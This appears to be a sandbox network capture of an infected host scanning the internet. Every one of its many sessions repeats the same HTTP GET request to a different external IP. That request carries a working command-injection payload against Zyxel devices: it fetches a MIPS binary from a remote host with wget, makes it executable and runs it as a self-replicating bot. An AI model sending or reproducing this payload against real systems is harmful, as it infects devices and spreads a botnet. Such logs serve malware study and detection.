                                                Jan 12, 2024 18:24:28.661963940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2588192.168.2.1358142223.124.4.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662009954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2589192.168.2.135211214.6.94.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662034035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2590192.168.2.135246064.194.250.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662081003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2591192.168.2.133541018.195.127.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662132025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2592192.168.2.134734898.174.107.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662169933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2593192.168.2.134649850.100.137.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662220955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2594192.168.2.1356038213.181.95.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662249088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2595192.168.2.1359196143.213.49.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662338018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2596192.168.2.1360644220.67.123.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662369967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2597192.168.2.134907875.140.50.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662420034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2598192.168.2.1359292221.206.202.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662444115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2599192.168.2.134819840.82.118.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662494898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2600192.168.2.1355248164.247.214.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662529945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2601192.168.2.1338742201.67.91.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662563086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2602192.168.2.1339408201.185.164.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662589073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2603192.168.2.1344366179.29.167.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662645102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2604192.168.2.135218223.191.210.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662687063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2605192.168.2.134738496.121.182.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662733078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2606192.168.2.1352388118.145.77.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662770987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2607192.168.2.1360540146.218.138.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662798882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2608192.168.2.1335604141.228.142.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662828922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2609192.168.2.135811272.65.240.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662878036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2610192.168.2.1349196142.75.160.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662905931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2611192.168.2.1335896155.90.34.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662946939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2612192.168.2.1357278223.45.173.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.662980080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2613192.168.2.1358436210.53.59.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663038969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2614192.168.2.1353152193.16.238.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663074970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2615192.168.2.1356988169.0.198.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663105011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2616192.168.2.135821418.231.29.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663152933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2617192.168.2.133709285.255.72.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663193941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2618192.168.2.1349016179.34.142.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663224936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2619192.168.2.1347986130.188.110.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663270950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2620192.168.2.1359920222.192.122.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663306952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2621192.168.2.1340550113.11.71.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663341999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2622192.168.2.1333998166.98.59.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663382053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2623192.168.2.135083664.10.239.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663415909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2624192.168.2.1349556130.176.91.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663475990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2625192.168.2.133622437.2.233.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663522005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2626192.168.2.1344038140.237.244.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663568020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2627192.168.2.1360580165.234.112.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663592100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2628192.168.2.1348322192.116.201.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663640022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2629192.168.2.136068443.136.86.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663672924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2630192.168.2.135413862.57.191.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663695097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2631192.168.2.1335678147.217.91.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663758993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2632192.168.2.133550077.138.242.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663790941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2633192.168.2.1333686140.165.235.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663816929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2634192.168.2.135688632.187.242.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663866043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2635192.168.2.1349378112.215.190.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663907051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2636192.168.2.1338150121.8.11.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663937092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2637192.168.2.134580814.0.107.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.663968086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2638192.168.2.1355998134.124.64.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664028883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2639192.168.2.135656042.239.216.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664053917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2640192.168.2.1350256120.243.92.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664089918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2641192.168.2.1336652197.128.223.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664127111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2642192.168.2.134930849.137.222.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664136887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2643192.168.2.1356780206.218.211.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664200068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2644192.168.2.133435880.32.2.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664230108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2645192.168.2.1332926217.17.89.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664273024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2646192.168.2.135028037.127.184.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664309978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2647192.168.2.135513057.168.217.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664385080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2648192.168.2.1351450118.10.111.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664406061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2649192.168.2.135524472.150.76.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:28.664433956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2650192.168.2.1358954204.132.27.14443
                                                TimestampBytes transferredDirectionData
